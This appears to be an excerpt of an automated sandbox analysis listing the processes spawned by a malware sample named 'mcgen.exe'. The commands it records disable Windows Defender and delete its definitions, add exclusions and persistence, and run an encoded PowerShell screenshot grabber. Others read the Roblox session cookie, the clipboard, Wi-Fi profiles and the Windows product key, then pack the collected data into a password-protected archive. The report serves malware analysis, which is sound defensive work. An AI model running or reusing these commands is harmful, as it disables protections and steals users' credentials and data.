              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Users\user\Desktop\mcgen.exe "C:\Users\user\Desktop\mcgen.exe"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\mcgen.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\mcgen.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8ED.tmp" "c:\Users\user\AppData\Local\Temp\ppw2wipr\CSC774215641B8D46CBA5382B343227E316.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe C:\Users\user\AppData\Local\Temp\_MEI32122\rar.exe a -r -hp"piyush" "C:\Users\user\AppData\Local\Temp\WiSkp.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping localhost -n 3
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\mcgen.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand 